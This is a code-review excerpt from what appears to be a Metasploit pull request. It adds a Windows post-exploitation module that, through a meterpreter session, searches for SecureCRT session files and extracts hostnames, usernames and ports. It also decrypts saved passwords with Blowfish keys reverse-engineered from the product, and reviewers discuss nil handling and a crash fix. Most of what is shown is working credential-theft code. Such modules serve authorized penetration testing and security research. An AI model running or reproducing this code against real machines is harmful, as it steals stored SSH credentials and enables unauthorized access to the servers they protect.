modules/post/windows/gather/credentials/securecrt.rb

```diff
@@ -0,0 +1,195 @@
+          where possible, using the decryption information that HyperSine reverse engineered.
+
+          Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md']
+        ],
+        'Author' => [
+          'HyperSine', # Original author of the SecureCRT session decryption script and one who found the encryption keys.
+          'Kali-Team <kali-team[at]qq.com>' # Metasploit module
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+    register_options(
+      [
+        OptString.new('PASSPHRASE', [ false, 'The configuration password that was set when SecureCRT was installed, if one was supplied']),
+      ]
+    )
+  end
+
+  def blowfish_decrypt(secret_key, text)
+    cipher = OpenSSL::Cipher.new('bf-cbc').decrypt
+    cipher.padding = 0
+    cipher.key_len = secret_key.length
+    cipher.key = secret_key
+    cipher.iv = "\x00" * 8
+    cipher.update(text) + cipher.final
+  end
+
+  def try_encode_file(data)
+    if data[0].unpack('C') == [255] && data[1].unpack('C') == [254]
+      data[2..-1].force_encoding('UTF-16LE').encode('UTF-8')
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [187] && data[2].unpack('C') == [191]
+      data
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [255]
+      data[2..-1].force_encoding('UTF-16BE').encode('UTF-8')
+    else
+      data
+    end
+  end
+
+  def enum_session_file(path)
+    config_ini = []
+    tbl = []
+    print_status("Searching for session files in #{path}")
+    config_ini += session.fs.file.search(path, '*.ini')
+
+    # enum session file
+    config_ini.each do |item|
+      file_name = item['path'] + session.fs.file.separator + item['name']
+      file_contents = read_file(file_name) if !['__FolderData__.ini', 'Default.ini'].include?(item['name'])
+      if file_contents.nil? || file_contents.empty?
+        next
+      end
+
+      file = try_encode_file(file_contents)
+      hostname = Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
+      password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
+      passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      port = Regexp.compile('D:"\[SSH2\] Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
+      username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
+      tbl << {
+        file_name: item['name'],
+        hostname: hostname,
+        port: port,
+        username: username,
+        password: password || passwordv2
```

Comment:
My one concern with this is similar to other entries. I've set these values to `nil` here if we couldn't retrieve a value, but I'm not sure if this is the best option given the data types of most of these fields.

Also right now, both `password` and `passwordv2` could be `nil` but the code doesn't really check for this. Same goes for the other fields.

My main point of pointing this all out in this section as well as in others is to show a few areas where it may be possible to address this issue. Ultimately though we will either need to remove the credential functionality, or find some way to ensure credentials are only added when we have the right data.

Reply:
Thank you for so much improvement

Reply:
@cn-kali-team No problem. I did identify one potential case where we might get a stack trace here due to us calling `item[:port].to_i` when `item[:port]` may be `nil` so I went ahead and fixed this. 

Also my original comments don't really make much sense here cause the reality is that we will be converting this table to a string with `print_line(tbl.to_s)` inside the `run` function.

Marking this as resolved as my next commit will solve the only remaining issue here.